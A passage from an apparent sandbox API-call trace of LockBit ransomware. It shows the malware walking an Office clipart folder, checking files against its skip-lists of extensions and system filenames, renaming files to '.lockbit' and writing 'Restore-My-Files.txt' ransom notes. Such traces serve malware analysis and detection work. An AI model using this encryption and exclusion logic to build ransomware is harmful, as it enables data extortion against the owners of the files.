Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.822] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned=".WMF" [0147.822] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.822] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.822] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.823] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.823] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF.lockbit") returned 72 [0147.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.825] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.825] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.825] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=39330) returned 1 [0147.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.826] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.838] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.838] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.841] free (_Block=0x1fa2ed8) [0147.841] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.841] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.841] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x50b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185790.WMF", cAlternateFileName="")) returned 1 [0147.841] lstrcmpiW (lpString1=".", lpString2="J0185790.WMF") returned -1 [0147.842] lstrcmpiW (lpString1="..", lpString2="J0185790.WMF") returned -1 [0147.842] PathFindExtensionW (pszPath="J0185790.WMF") returned=".WMF" [0147.842] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.842] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.843] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.843] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185790.WMF") returned 1 [0147.844] lstrcmpiW (lpString1="ntldr", lpString2="J0185790.WMF") returned 1 [0147.844] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185790.WMF") returned 1 [0147.844] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185790.WMF") returned -1 [0147.844] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185790.WMF") returned -1 [0147.844] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185790.WMF") returned 1 [0147.844] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185790.WMF") returned -1 [0147.844] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.844] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF") returned=".WMF" [0147.844] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.844] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.844] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.845] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.845] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF.lockbit") returned 72 [0147.845] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185790.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.846] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.846] malloc (_Size=0x40068) returned 0x3df0008 [0147.846] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20662) returned 1 [0147.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.848] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.853] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.853] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.853] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.854] free (_Block=0x1fa2ed8) [0147.854] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185790.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.854] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.855] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fbf9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x650c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185796.WMF", cAlternateFileName="")) returned 1 [0147.855] lstrcmpiW (lpString1=".", lpString2="J0185796.WMF") returned -1 [0147.855] lstrcmpiW (lpString1="..", lpString2="J0185796.WMF") returned -1 [0147.855] PathFindExtensionW (pszPath="J0185796.WMF") returned=".WMF" [0147.855] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.855] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.856] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.856] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185796.WMF") returned 1 [0147.857] lstrcmpiW (lpString1="ntldr", lpString2="J0185796.WMF") returned 1 [0147.857] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185796.WMF") returned 1 [0147.857] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185796.WMF") returned -1 [0147.857] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185796.WMF") returned -1 [0147.857] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185796.WMF") returned 1 [0147.857] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185796.WMF") returned -1 [0147.857] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.857] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned=".WMF" [0147.857] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.857] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.857] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.858] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.858] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF.lockbit") returned 72 [0147.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.859] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.860] malloc (_Size=0x40068) returned 0x3df0008 [0147.860] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25868) returned 1 [0147.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.861] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.866] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.866] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.866] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.868] free (_Block=0x1fa2ed8) [0147.868] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.868] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.868] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.868] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564c4a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8420, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185798.WMF", cAlternateFileName="")) returned 1 [0147.868] lstrcmpiW (lpString1=".", lpString2="J0185798.WMF") returned -1 [0147.868] lstrcmpiW (lpString1="..", lpString2="J0185798.WMF") returned -1 [0147.868] PathFindExtensionW (pszPath="J0185798.WMF") returned=".WMF" [0147.868] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.868] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 